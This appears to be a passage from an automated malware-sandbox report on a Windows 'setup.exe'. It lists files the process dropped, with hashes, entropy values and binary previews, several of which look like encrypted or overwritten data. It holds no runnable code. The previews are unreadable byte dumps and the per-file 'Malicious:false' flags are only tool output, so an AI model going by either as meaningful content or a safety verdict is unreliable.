WV..lG.....S.%.......|.....]$...U.H.|....b.....n.rl..q.#.u....4&.>:@-<s..&n.Q.}.>.u.N.xOE..t..o]... [`..w.&...S...>....f.....EA.q..tb....Q.F;.1k.(..2.....V.o.`_).2..n...nv..!D.....}'.yv...Q..q......i.}._C.N.....}.m.C....fk.S.n0.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.207954877323779
              Encrypted:false
              SSDEEP:6144:ukNxFjJGiqTnnfsiSfpUiLRMEt1uU3uhhf:ukbAZAecWEtEUe/f
              MD5:6AFB9F32F135C1FD1AD44D6B71CB7679
              SHA1:4DB21629E6F4D188A43BB2080F68AEA897B3298C
              SHA-256:02035F254D1386C95F4FEC9873034B4AC623140FB96D5CD46E3FE76B60D533AD
              SHA-512:F37E436EE64177CDAEE5AAAFF57CDE474E8D69327CEF9D831127FE0305F2D1F48AEBDF801ECC6820270E5653051F3EC40A858286B79F2CE5C7D854A30E7C65AF
              Malicious:false
              Preview:.....[.....WX~]...x[.-.DA.7.1...T..&.Vr..8....h..s....X/_/.X.o..k.P.._....g.%..QO.....BpX..$..),.!.]...........m.?}[j.....KJ....&.....4u.c.~..`.N.-....0F.....D..Mr..X'.......RL.t1.'.0u.3K..(h....&g.z.........C.C.Q9 .....2..[}..H{..$..%..<.o}...'...ly$X.........Y.....M..y..aA....k..V?.....S}.M#NU@...a..G.s.p.AQ...&|~Q..q./!.....Us.Ua..Gv......Wq....o.K......(..2..rD....{t.5.C..%.ti.......$..\...I...A..j`.b"!)V.....g...1Z.+.)N..4$..b..f.G..?.4X+....\...]E....l..,..0g... s"...9....&!.Y..1....+...xw.m..'...U..$..Ul.uJ[..'.H#.`X...W...@..!.[.!P....=..Y...B.t..]<34.....=.+.gD.C).3....R}..._... .F....'sZ..{E.....]..F.vO.....G.....kUX.........\.y."../ .P..V...$.kuBNE...=%.y.p.Do....y..X..lV.Oi.....+6...u.p.... .....9W.... ...._q.."a...h.r.D..9....._..}.B.>......s..1......:-.A...6...jl1.h.VN.E.@&.3.[..F.b....7G.......PR{c.b+N..2....~..XB)q..vwA.~..}1q8.u.....M.\.v..E.".rg.t.U...i.V]..l....BO....7..c..+..O....4,... UL.....9x.^7z.....u&...b.F(.9..f.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.208049572086897
              Encrypted:false
              SSDEEP:3072:l7CPPcDdqRuKiHpsZO+6va+BpCh8mVmMqAdu9U9e69ZwHZM8P3D:lOPOwRBiHpnzBpm8PMp9tnIMCT
              MD5:B7C21955ADD9B64C91BF40FE82DA7FC9
              SHA1:35FA4CC69769BA676553150C0C07D1B9F3BE0D8A
              SHA-256:8D190C3275C2929AB57AD6DA5AD5FCF0FFBD32FCF42057B913AB3A3BA0381AB2
              SHA-512:00C5BFC0A7144B04A2E5FDE6F7FE0B3A0665698E4149A55F6E47339F60D0F9C9065CB5273EFA7C77E3285E767ECAEC65B6DB0817339EFE13769C9EA6CA2D31EA
              Malicious:false
              Preview:...........m...w^..7X.)4.....5.8.....z.v...R.?.6.....3...a.... N9.....O...Z.'=....n.c....b..:.jh)Cd.&$,~..a)....Xq.E...g!..9.`>=..2..2...e..0.Q.........}.\....[..a.s........m}..#..|...`#.7y9.'...o>..P..%.6U.-....D.Vl...#h.CD.T..=w.Z.p.~LE-........d'..Q..d....x%.r...c.(?Q.H?...V..~..q.c.9@....$..C.....^0.M.fs...;S..QG..Q.p...;..6F]..."u.9...2l.9.Y..8\..L.`..[q.}.1..jQ.#\..>...X61..........,.P..../..(.-.G.^....58.x.[.PwZf..%..x........`......z.B.4".W.....b`zv..Y...,.23..n....LPID....[.!.>.....mF.ZF.m..9.IB....d..!.j..fR.6......w.>{.....Z...K."........w1.9... ..w.f].]86..^.........e&.....AUXhT.....R.&...6...}&.8..r.%G.....NM.n.i.o.:.qd..Kh.r(...'j.j...{+....l........z/Eq.<..GsH..$..X...3N/..s.e....XS.bC.&..a..oZ...C:Y{JD...D...D...A(."`.S.8e...Z...!...=.@3.f.y.)_.?'H....H.....v..eU.1.!..N.I~.9..[L...r.w.x]...}...>.].y.)_.-x.....tV,D...../u..Tc.cQ.X.x......9EDW............KS..>.$.l...s..N.g$T.uO..X.T.b..[.!.:.]....X...s:.......v..L.......N.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3384
              Entropy (8bit):7.9477874546429055
              Encrypted:false
              SSDEEP:96:JtZJBQFG8UnxZok7xdsdM7+GCfNRugGqOzoLwwaK:JPQFJUxZNsK/quqaK
              MD5:DEFA451C36343689C6536A3451993D66
              SHA1:D226710C08B6DD4777D360C75C96F9A955859887
              SHA-256:665AD23886D5DD429DD955A31676B6F4BD1B7787A7CCC7A299D89645586D4A99
              SHA-512:44449B6F55F78BDB7FF38FAF41049C1DDDFB2176AD9D170D1F8EE74BB41F2B481B4E9ABF20D8FB83C7451B7F536B3880FF75F9989436F8BF1CA8E142B7BEDC08
              Malicious:false
              Preview:<?xml}.B=CVom.(]We....8.;..27..u.EF4H.+.....5.|..n1.|..t.!...Z.4.&.WD..E..k.....".}..ET6%K..Q.S...(R.3....O.0.x]c.....?%..<....w2......[.6.....5.......V...9.;..w...z..O....XI.=..W.oB.E..<...R....=b..-6.h\.vD....8.VKh..t.....On..g............{.c.'...L.....y.........K.9.}......(..X...3Y.a...3.......5......:..i)...cZ.S....."5.>..6y\.F..t.(.....\.......&..^.o....lQ.!.).fI..Y....?P.|..^........0.z..U.T...$.M.....0I."....]..FS..... ..M-R-q.n........?g....5...j......3.;.B...QO.jjx(...m..+.M...Y.......8~....C..2H...../^....\n..-.V....v.>....J.q/.*.#@......K......._..k.W....,....e`j.N.....g...#......<.:G...Ok<.].m....UX.:$...~...IJ/..Q . ......W_..>fz.N.q.4.....o..@.l.....m.i..r.?...r.40....H.+.....Rq..;.o.<....U[..w..% J..Y!jub.".%....-...1_.q..q...Xs..P........a..F].7^_%..t.Y.B.<.&..e+...z.RS.....M....-.o.x...s.h.....2..Xr%.3mo.......B`..d.R..Z.nv....F..aH.K......B..!>...v#..$...B...!..2*..}..x.7.`f.....;x&.e.u.hY..e.DF.Q......e.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):724
              Entropy (8bit):7.725928659135244
              Encrypted:false
              SSDEEP:12:pLyTXPlZMgWCBhkZzybrts9T9k9zeVypJYDi2mMU46xGx1IwoKHIWqrbjbczvOsV:GXjiQ5s99k9eyYu2mMJ6wpo1WfLbD
              MD5:D1EACC0782E771FB96B5230D5E8736C9
              SHA1:426E0645BB63FDD4C14932359EE6534D27FF8845
              SHA-256:5E0C3D4BFBF22BB5E04F89E46B516D156DD023298961E148C1D0AA3DE4B4D416
              SHA-512:A44D9206F79A10B5562B1D9098F48D2EEC620FC71D5BE2364DBF921D45EE2A8D70878EA39239877BD84FCB51E00FD28A3A47A2A7D3CC8E7A4F7B25E0E662382A
              Malicious:false
              Preview:{ "Mef......DP&..A...T'..[.....C.4w.+.<9.x....<:k.O.(6i.T..Y.U..+.\D.Z.6^e.dq.)C..^1.a............N...N.a+:.h[......)...=...I....i.).}$.......p.(.>...r6......2.C.B.5pq..5...2'.....D....y`.n...f(m.,.........N@5.|.X...9.[eT..yg..5h.S..I..,....w.`F.......E..%....J..".V.$n*.t.....9..a....A...._. Z...h..^]%.c.=...1...G....J..;.#..,..d..>q....}q.r.........~...I7...nR..eC+41r.i....L...Q..B...v[.t.<t.>.8.V...3+5...2.w.`..'...........m`.........A../.P...8w........2....}...j..rL...%$.....q.l..'..X...&.`#...^.H..Qo.~q...4..2...j.rHz.....X.. ...K..;.%l.0........ ...-..6h..Ax.H.K...|.r.}abu.v..>6.c?......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1062891
              Entropy (8bit):5.5304278351076395
              Encrypted:false
              SSDEEP:12288:X1cBaYMcPinIOXSZlV0N8x5thr291gess3TylunX5:FckKiV
              MD5:927276E7F0217621BA6E20D958D12E08
              SHA1:800363EA814553F5C5D2BA24FCB499FFFB820EB3
              SHA-256:3E5FECD14910AE4FFA26237E38BA469C56065C98B72A5CF3537D764C40F7AE68
              SHA-512:5150F75FD2DD42DC807790C501676569DDBE85267050CD951825705505B8C6D258844522593220E489B38D7C85BF0BA51BB2C63F5CC9A6A7873112E4739BFAF6
              Malicious:false
              Preview:<Rule.4F..Y....x.{..F?-.gb..0qCq...^....9~...Q.X8.rd.Y.q.?}u...$....I..8Ih.1.f...E.?...J.**..7.....j.....}Q..%.+..|iMUKX..E...#$...f!.A..C. N...P6X..........%2i...}..."...F.....J|......yt.q.u.6..wo..)y.1+..c#.%.._.U..(E..N.......P.............E.....K...pp..wZ.hh...G...3.]...+."...+.>~...(.FH..?7....V.r..e..3.Y.."SN..r\F...Y.}.\.2)&b. .*.J._.#.Kz.G[W...d.-.kW..._{>.@.9....... .I.....wE..E.R..m".../.lB...HE=TG...%r...8k.:..q^.4..Q..da||...z....~r\].a.H<.I.d.j=..p.{.I...q6.%sm.*.v.....>f..X.g.'F....I.8.s...k..{I;n.NY...A@xO.ur..).....&..M.;9(_@U...l...K.Fp......F....d..U.y.........+.#tT...,q..D'a..g+....b4.~..a....0.......%?...>.*..u...g..1...._M)....|........u.......v>.Ti........;..J/..5r.2=..c(H..U.....m.:.T.....4..O..l.....qK....g)p.YL.8......Cl}....Oy.5b"V-R../.wTE..D..[./edxt+.q.N:."K~..@)..f.VWJw.TL"..E)..D.z.=X[.;...A..$.1.9......!..-.p..V.\..o:.%.Th)..H,.I.....u.0..W...`.E.%?..Z.Bx.X.t.......8..L0....gg..m.....>..J.......'..2.._
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3363
              Entropy (8bit):7.937889216220232
              Encrypted:false
              SSDEEP:48:Zo+YBVd/Noo0oe3dt6U4ee6hJ9D68DnNYyuhP6po2aI39exw/4SuZN5uUBuD:ZcBvlEjt6MFTD68RYT6K2aIt1/4lbW
              MD5:1CD9330C84FF3030ADA6CFA4390BA859
              SHA1:C8FD011D82CFFC7D08577BDB90D503EE8EAC63A8
              SHA-256:58A7A4D23BE3A6CFC593DF752F5FDB91A15B91014A9C82CBF2EEAC18FBD7D437
              SHA-512:8A08E7D5E15106F10AB8B95A7FDBE6C91773CCD29AB495EAEB95EBC8A2BA4B5A739D4B5ED8DF4F7ACBE454CA9BB540CC35C98A72FA37600AE1A350B2B015D1EF
              Malicious:false
              Preview:<?xmlYu.P.}8.Y.3.H.....8..o...c.....k.;.....D...'k...w.4r;LS 2.....,m.d!....+..Xi>..k.>.....t."2u..HN.jVW....i..2Q.|S.........{.1;?.3..<#.z9.*..zb...m....R.-$...%.4:I3..{...bY............7.o.m.tH...7.\.%.$W........M...l..FX..I......J&..I6G. k..........-.y..m<....6.-......`.|g.."@..).q.?....GI...{,..9N...-.[[v..>..I..+D5...-....N....Mh......0.|..........&?+.I.1.p?.,..jJ". .~.;...v.....<....SX..}.g_..VQ..m.\.!.6..k..MviQ.X`./...1l.L.7#.O.mg.+...B.iSj`...P .)....k.k....V.+^.S.77..B...P...%........H......n..-a. &..-\....!.G.>."...t;9.kr#/-..>.d...{..0.I*..O.[..0.~.;...Y...Th..D.....%.......x.S..>._.$...[.Q...0^.........xh....`.S.........pW..?Ox.+......;mU...(.u~R1.Q..2~.pWI.es.P........Q.+=NN..iP.<T.WC...nQS.....yC..RM..|&(..E.....,>.J#?........,.-..A.....^.BZ..__...t..Y....E:....0&..ie...'...]......\R.<.$.&.T...9..vw....R.#x..[......j#..p....h.. ..._..&....vf!.B;.(...:.....c..i.Sz...^].RKV...;'.,.-...i..J....g.i.A.Qo..thg...2.Tpt;.S.......L<,f..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1295
              Entropy (8bit):7.847394373559402
              Encrypted:false
              SSDEEP:24:SqbZrACqFtEkBVkW3RXfGHXNC70eZzwYWcuhVB1oQ0D+BkmMghuCSHebD:Sg1A9rEkQWRrvWNhV0QVqmMghnSHcD
              MD5:6FCC47514F020532B91F6A44C9C68CBC
              SHA1:EBC03653115780D070220D4E3B7446250894E320
              SHA-256:E1FA9803756F374C6F8195AF49D0F4E9ABAF401115E248B8711B0130254EB76D
              SHA-512:CFB0BEA2C92E04C5770D10769570E5E0F7857CC98E71CC6477C34D3EC04345C77929753E32153420F15EFD2AA153AD6BC2C6AA464A88E053D7ED91C28BBA0038
              Malicious:false
              Preview:<?xml..F&.,......Gu......'...2.,E.<[..A...._=)Gc\?...e...#m.Z...'..X.g../.....h..#..(/...........2.o.j..]...tz.^Q6..r(Y\!/\.Q......A.......k.G!^`u5.je.+FA.y..K.....4~)|...LA.....z.:..;.e...R.....e....V?.+...[..L.../..k2)i.ZO#....K..q.~2.,.RC.x..A...m.g.z.....K..O....&`.....G$...........?...3.N.7.@.....?..|.!(.n.`..V.......D.%.e..zG .M.|.. GA.0c?.g~J..>m4,.b......T..9z...D%.....<<.:.4..u.z.h.....L... .Q......C...8..9$6T....8.....X.3..#x[PN....m.+S.Sy....4.T....mR.;...w. ^.mZ..`....2.W.....bD.zOZ.h...e.........5.&xQ....CFg..f%9..r....`...4{.Z..............4.3|..3X$f.Jg....;..o.+a..-).Gq.|.H..E...t..E.G......ZK..j....N..s.....Y....,.Z......xPpKy"&(M4..e.-,.D..>........w...6F.U.oQN .....lCA}...!....$8....Z.;7...mw.ep..9k>{.....=^....B...6..Ml..3K...rz.c...f....Z...7.9..*X....M..G.....y"..\A..T_..Pi....Q..jX\..~2...k...f..f!.... ..xP...4...\W.OC#..5.y+3.l..O...2.l.....]v............8..4.H"...}zZ..|...~..j..1.e.d......4..S.q......&{_S.v6...7....V."m.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2582
              Entropy (8bit):7.927542076738295
              Encrypted:false
              SSDEEP:48:MjbrJUOoYfvYVsx9Soj/CMfogVjPN+fneSiCcms1c3DN2PPU/RyKD:8UZ4jjfogVjPwWXCcms16NEMpyC
              MD5:5ED45703CE4EC1CD4963623DAC822032
              SHA1:4E98CD71B25E778D5C0A0DE63381676F92FF0015
              SHA-256:8B7072FEB3E6833E1AEA8FA168C36D620770C85DAE7C09558353B0ACCC646543
              SHA-512:D113D46A935711D0B5B3EFC4DB877F6ED581EC969445F9BCB1AEEB22A5C543D79A3899AE358511536B7770A2DD2446841D3506FB755172F2DBB1269611829008
              Malicious:false
              Preview:<?xml.f..#..`.C,..5.4,.Zl..n.nsW^.....z....$.e.....z..Y..o`.w.o<.U..(..>.'.......D.m..$+.cX..2"...3S...h%..<.......j.,...x4.2..<.H.z..wG~}.....G.T;.}8...R...gce,y......3..Yh}.\.v[..k...2...<.Z...w%x..3....j..~....`..h.......P.......:..n=m.....Pt...KV.W.....\.J...M.LcH.i.......*.Tw..c..$...-...y..5.Rr`...f........A...2.zN...^b..)d.DgP...<.i.@.^..nb.Qc.u2...f+{......#.....f.i..1.......v..!..M...8.q.J.k..5..is.4!.......c&.....P....i..[...x^(...:.e...a5..P.3o.L...D>b.b.9V.i.".....o..F... ..Ut.+u..V.qw/;..RC....p]...M+\..y.l.."C.....|'a..`.a[..^.HPs ..6....`.qu.2.KC.U .._ey..{l+sp..P.....p.&f............{...b...z5...$.CB.L.......mEAU...6.;..^..")t.r.-.W...4..*a..J...D.k...@O.d&.f.y....U.......yC...T\SJ.. Z.a.Ho...t..w...B...h.]l...X8....r..;.u/H.M.(.......f9."......pe...nb.Qrm...%..&..e.E.[&....F...)..#..&..e...z(IhW~...k..,.....>d.}nq......6.....'K.(..*.CK9.-..gJ{..F..\...].cz.@.7........L.U*.4...u..|_4..........j.:1!Q6.{w.......<..|.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1787
              Entropy (8bit):7.896367727192489
              Encrypted:false
              SSDEEP:48:HxxLUv8x99XOUeqiA0gzW7I8y3ntU70tDDlawY8KD:RxoEVXJeoXYIzntUGaw9C
              MD5:CB5B630CF4D42562661269512CF19E64
              SHA1:EA8BC698808C671AEDE6655F0319C3A97595AA0D
              SHA-256:06DCBF2B4D79B2F3C58B33FB5AA1074152E51BE37BD24AD7497CD0B3542717C0
              SHA-512:D57E98BBAA2E2D2135A5D475C3066B9AE82F91E88F56D6B449C0D6D87406CDCA70E92A5B9B1BC43A2B03FC221966D76393DADF72D1194FCCA32625295629CFA2
              Malicious:false
              Preview:<?xml.....P.q&av...J.H..ke..'...n8..A.. ..a8...n.LY).W.".?...Bj..;....Y.2....0....;z.N...ny....n...J...Q.h?.3.'4~X..Y.:S.K.V.$.u.5R....X...#99b..[F...j..y"K9.Q..X."....L.).P.{.f...O.!\...B.'.4....L..Y.:=\.f.... ....7| .../......C...uijl......}X.v!{.[...L5.~^:y..F....J.}..*=u..g..XbEY2.. ...s..M..../.I.B.;....G....y..3<]......ky....3.:9..C...y9.W..DMj......M....o..eE..T:......l6........I.)2...iZ....Jl....6....})...I..)ap-D.......h..u.h....Ta..X.G-...<.;LML!{.G`o.._.."..u.>....1....~T.`.V)e.zk.^.Q.MubJA..zKx.&.FO..-..|i...7...`......0' ..7..1f..j.....9...4A...}"...I5...'b.fA..nC. e6...}.V4h..RR..]x!DGq....HK...[._.Uy....\......#.j......X*.N.].g...X9U.o.g.:/}AM#.<......~N43t...I.C....n.5."_[.g.."..=..B..8.X2.m"..+...l.J.=P.C...]+..;.Lh...X~Fw4.Hr.V.&D5C..XDM.:_...Y.\..xTU..(&D|....).K.t........(Y.+.hO...X..@....~]p.\.2.D.$L._...c).=./{...37_.t..<.6_.m.{.....~.-....m..R.{.e+1.....,.~....k...4......)..._.>......k...$L......g..05..D.-....{..#.W?.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1583
              Entropy (8bit):7.8738715859711705
              Encrypted:false
              SSDEEP:24:AnU7lwYHzGghaXIPTbR84Fv4gvaHTBJFI0V8L347Prop6cH4dQD4i20TY1xpbD:Asij4ZZfvoTBJqK8Lo7QGQEP0s3JD
              MD5:FCC97F454FB70E0FB271749E55478875
              SHA1:FFF4BBA36DA13CA08D9C93B0BAEEB3B5F7F573B7
              SHA-256:BD356DE32DEF3687DBBCB27E33AEC6ABC9AB1ABC3872AC4C9CBF20354090F3AD
              SHA-512:A4B63E9C67A5F29C199F4B2FDAB8992FAD515E221683A4204F42764CE53BBE6FF2F88851D22203101320C845F6C9A99E13C748E370565DC38924308A1CEFC128
              Malicious:false
              Preview:<?xml}s.~.....=.z~*.:j._....H/.....0}7...%7....u....|P&NcO*.f.*..F........J5U1.#..~zd.s.U.....9.. .........c@.._0h.... P.K..@..c@mA...b.0..H.V..o.*N}a...4.0i4.....-..........M.=.w.;.F.......W..&z.. .t....&....[0......3..<N.>.zS..n.el....!;...A...:.TB...!`.*~...Tr...V.M\6......2.M.....A..5..5..+.b."..0_/.^.....[.S$.....5...I#..P.J..6+..hs....h.fU..}.....S.."...8;....w.?]g.....6dM.....Rd..+.R.}z..[.....eR.P..js(.v...d.i..._..>.q.qr.......Z.=. ....!.......]l17d+....G>bd3......[b.2...).....=.Y.:i..{.fr..."%.[dm.b....UM.JG...=D.*,V..<..D....>..G....^1.....%..rqI.<8.....S.A..%..].m...GO+S.. .....}P..E..v....v..=~......{.i..9..+.C........Gf..]V..W....)...L.......z.6..7..*.T!.....B.......Z..H.y...8.nNw....O.S.S.q.S..*..`S|....K|n.t....).U..@..'*to....Y.k.....O..7..N.q..#S....%|m....la...D....,..n....z...W...0~.....x...#.i.P.t...h_....B..t..,.....c...s.vy.....nZ._.&.1h...&hK.wM...fW.E..'..Vw.....tA+ZJr>......^.9....b..6R!.P...m...@.-...u`.L.h}s.2.d
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2801
              Entropy (8bit):7.924531561191622
              Encrypted:false
              SSDEEP:48:5zblm9CFwb96qyv7DZ3E+FLG8PJH5x8gRg8WlsG9BrsarMvr+TIGYXxwfbB7/D:xOCFwtyv793XLnjKRhBgaoaWG7r
              MD5:FB13374FA44AB5489F285D3D5F2C0FC1
              SHA1:168A45CD9BD741341D9C27E9768D3762238AAB3E
              SHA-256:AE5F96435E8C118E414BF78FC6560E7CF010507DE533A5ABDBEACCA94E7BD0C4
              SHA-512:2B6FF974146C09AB37A94D69730E66EA52E2FD04203DAE67C2A08121CC08E96F771704F12FA04AA8F6225EEF75ECBB52D6CA2CE4F4371E079D87E953148A6494
              Malicious:false
              Preview:<?xml...a)s.J.>..hWfN.?..Ll|....V2E......s=..j?.Z.W.S..D.@.@..v.N..H.8..+...u}....m.O.....SIYC.,.....".n..8....9.tE~i5..t....K....y.u@......5.x%PhdqT0>.5..3ICD...Gf.({...C....Ha0........l...t.t~.P....du!...gE.!..$..o......Q]....R.?.......YP..-G.U..7.w..!c.......&.....xF..y./x..U..N.52...)?.z..oX.%...MXqD....s..d..m.... ...>......#r.&.`..o..1>e...w..../2......Bh.E....a. ...J.s+~...JCSw..2XS!s...N....i...%.F.5..Z.<......Fh.oBT...W.~...q..T/..).........;Lb... .l1F.V.4.....z...M.qq.M...gLT?..N..d..&...r....o...:X.I..O..[....h^.qr..s.....*.WD...:..x].GBX..P..d=...r.n....:<W.'..ow..z...5.E......Atw...f.2.mU...#.`...p.7...T~...y...|../B.....w......iP....:..].M..v..<..,..h?,:WD(....".uH..c........KI..Th{...-9....... Y....o#z..~..........f...r.8S.UoMU...lqr}h......$..Q...*..7.v..AAF...x..n..>[....$m...m_m...m.....du..........Vv.........^m...$..Q...KI's9.1.)..x..>...Af..m.t..V.M...@.l...`..."...5...Y..?)s&u.Zf..jU.L1..\..-.%_..!............
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4121
              Entropy (8bit):7.951175214630723
              Encrypted:false
              SSDEEP:96:K36Z+HNbk02EORx8MfIj7gHoOpmM5ATsfDV+5mG6ya:KwjE8x8X78o8pBMU
              MD5:A18DE337B193005A7EE66EAC87BC8145
              SHA1:5AEA0815394AC5FB6CDA3A353E78CC56081C3D99
              SHA-256:9C6089CB13239E494EFEB5B8AF165F45248A6AD9C8B340EC65C014A66462AF28
              SHA-512:40146B07DD972C935210FDC6697A9E30C3E43BE789C953C8F0C8737EAA9C8DC8BB42A9794AC44E7BC99FD10B9702E40731BDA51CD3818AF5AE85B6FE2F76861C
              Malicious:false
              Preview:<?xml..^..6O..W.+D.j........w.`./..M.+r.....+Sx......../...]....;i..V.+..w.(j..[.k...uwU:<..n.az4.Mq...}...SqY.^...J...."%...C...a......<^..>.0 .0...T..W.....g.....(.K.7%t.Fe6...!C.g...u.*M)......4F.~&.$.......mu.GqDt.......~.<.......l.a..A........M.Y...v..ft.#..l.y...[..=QS.....g\.H.2x...u.`.aD"XF.h..8.).....[V.|\f.?j...~A..O...V.....I,.'...X.B:.*.R.,.M.\pQ.........|.V..I....$<I.........k.}-t@KI...|;E....-+xe......+...\...-.(AK)..I...b.?.$cj"..u...c5.?..6......3.D..o.7_$.....V..5.`G.k.....@.k:.t..B..f+.C.a+...r......w...E..'.6.#....o.....S.~b..,G..e..l..k.>V.d.h55-...j+......'.IWg.<.2....?k..\.=&..'.ihO..l.rzj....Yy....O;.X..&...v]...o...\.#XS.i..jZ.q..W....mH2M[..,q._...qOb4..Nd..Ob.e.#.M.H5h6!!9....&.yR..b...._i2..J..<..a...8..(............Nz............$.m.S...d/../.3[....?b..pN...*.$..X..ds.~V.m.r.](..".}._.".9BFF.K>C.H.K"..+.Q.d......f^._.........{Uk...e..o.Q.;f.b.q.Jqq./yN.. r..'..W.m.%.+3(>......(0h'g>..-d.3......]...I&k...".
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):8140
              Entropy (8bit):7.975242222623851
              Encrypted:false
              SSDEEP:192:Jr/GacGpCEexi1PJ+RwqZfP48dUcaIrfF74JpHEIzX:JrTXsEexi1PJ+mqZfnEIzF74KIr
              MD5:598EBB8BE633D4E5EAC3BA35C7B3526D
              SHA1:613DC7176B1F71CAF467D48B11771DB4CDED9C84
              SHA-256:50C8DBE897043A56FFFED160249D689C2ABE12FB418A43420C8B02095273C9EB
              SHA-512:175DAAA0E248076B40A6747911FC000395E4060BA0B2654A2C6FAB8858E3555C3E452278F68C5F32233BD177D04C32D4ED5E47F91D62B8DFD2DFFA35D4371796
              Malicious:false
              Preview:<?xmlRf...O.yk.b-o5..M5.7{f..'.gY.}.^H.........>l.M..[..B.....%.'...c.+V.{..`...@...QMyr/.:...x..>,j8....s.......'{..m..2._...3{.nq......J.q.@......+..._.=. f1.&.0.~.5.C..l.e...`I..J<.-)....U@YS...ATR3.G.._....A....*....J...q*.w.....!./..GCY.....O..p...JBA.a..5.?.X._......o-=.,.qX.0I...j..?..}............ .G.. '...vPp...u....>m`....DI.jV....@]Q.;.........f.....7.2,.2?Q..10...ec@.......l...t.s......q.(.......`L...k.P.Y|w0..;]...M.F@...c>.[`.i@.y..;.H.9MU....f..`......co#...Q.....<....ONFr...@E:..U].......k^.*.q_.)ly.4.w........."...f..:.......".@..N...<...g.....S.a...) .>V...2..;.&....u<....oTg;.a.^S..d..W_m}y...EP..t..Xq$a9..".og..........H.C....C.:N...8..E*-..D....j^..$.N..gc.)k.vt.M.b^#.....)..e9.}.q..q....|P...sc..Rv`~..S.|..._..'...t..cB..p..k......de.@.;.=.E...7{.{GP...F.i.u.9~.7B.^.P.=..TP..E...x.....w=[.......)........C(.N|z. .<P._..R.0......[.Dq.....I...... .......7......[C...o. ..r.=.I..SO...z...3.E.....L...U.O.V.E.0....K.h
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3313
              Entropy (8bit):7.938430933236305
              Encrypted:false
              SSDEEP:48:C8umASp8k9YoML545O01k24Dkno6IDSZ2vFqIDk5U3z/FjwIo4S/UjJBvS4D:M4p8MYd5FDAo6IDSZ29dDvz/uIwgJd
              MD5:569879CE8B085C75FF0A04C69AA4EC10
              SHA1:712B2DE01999B2ABD4C9EF4064D9DEEE90F820E5
              SHA-256:F993762BCEA7A8734D8120EE6B2D3183233C30192F37AAEAF03EB85A8DB55B6D
              SHA-512:B9D3C30B976419384BB49F97028D8790139F69D2A693A5BAC2E4FFB768EFA3CE46F6DDF49E8B6863637DBE7D080D8E200C0805F82FB03B7F6545E3EE1E5E647C
              Malicious:false
              Preview:<?xml3...,....}NY...+.l*...K.pv.DkW..Z..D..h.QZ..T..o.o..#.n"...}.r...#..b..Q.]i.........m....^D.bY.E...*...a##..).WsO..H9.{....i.q.E...w..r.<....R(....m..C..w.z..I..O.#....8y-...}.u.`}.B....jD......^..1_Vb.._"...5.N|..zF.....'`..!..G%Z.2-H.............+.Aj...x.)l.)M*f4b.t..-...;..1M.~..#.9ZBA.K.....-.i_..r.'S..<.G....vQ..5a"...h.y....1C..6.s.+-_.9.........sW..n.i..)...1u.lms.?.o.A...q[(@....S.*{x.*B.-..c.N.,.+.. .J.....o.....7P..W .oF.C.....V.Xd...q..j.i..f*^e{.h4.........._p.=.W.7msn~.....N..<_..s."_....8.d.....)...D.N..f_}bk...."C.#....u.b,.X...*.g..r8..Q.*...Id/(.}7......_...AA...`\O~-I...k.6.6.nX......S....%..f{y.h...@>]o..\.A.k.5.n+.?L....%...'ff....~...EvP.7..b....X....>..CV.az..4{G...W1...[.H....I...G/Ym.(o"...,W6(.-.;.".]o...xNf....._..c.'Q...\.-.dJ..L.|....}3!om|..L/LM....O/...YL.3\[._..2...v....".P.t.p..r....X..4./....?..........].~...]..e.0,..... ....*.I.FZ......r...S....8...o7.....?....w....C../.K5"[.0b.Dr..pO.+6.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3675
              Entropy (8bit):7.948816868302436
              Encrypted:false
              SSDEEP:96:9W8/9g+mjcIpBjGpKzLq78eQAO6bVPo8JggGW9+:9WggpjcIpFVzmowEaH9+
              MD5:DDA48368836C64A19CC84F2130036748
              SHA1:8586CFCB8D0064C583B406DA1EBC89A2BB442AED
              SHA-256:92CC61387DCFCD2C7F46C788A47130F476E0FA898CC5C268B25B5D4F5F42B270
              SHA-512:AEE9B7E9F9BBDD7BBFB85052D10275B0973F41BA59D3A01DCFB6B62010BE227125656452FA6F9B5C316C98F3464132895B0DDC37680D09BEB8293D5690441FBC
              Malicious:false
